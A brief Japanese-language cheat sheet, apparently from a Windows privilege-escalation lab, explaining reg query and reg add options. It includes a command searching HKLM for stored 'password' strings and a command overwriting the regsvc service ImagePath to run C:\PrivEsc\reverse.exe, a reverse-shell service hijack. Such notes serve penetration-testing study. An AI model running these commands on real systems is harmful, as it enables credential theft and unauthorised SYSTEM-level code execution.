reg query を使用して HKLM 配下を文字列検索する。

• /f : 検索文字列（Filter）
• /t : データ型指定（例：REG_SZ）
• /s : サブキーを再帰的に検索

出力が多い場合は findstr と組み合わせてさらに絞り込む。
設定ミスや平文パスワードなどの痕跡調査に使用する。

reg query hklm /f password /t reg_sz /s | findstr "admin"

{none}

reg add を使用してレジストリ値を追加または上書きする。

• /v : ValueName
• /t : Type（例：REG_EXPAND_SZ）
• /d : Data
• /f : 確認なしで強制実行

サービスの ImagePath 変更など、設定書き換え時に使用する。

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f

{none}

reg query で特定キーの現在設定を確認する。
サービス設定や永続化設定の確認に使用する。

reg query HKLM\system\currentcontrolset\services\regsvc

{none}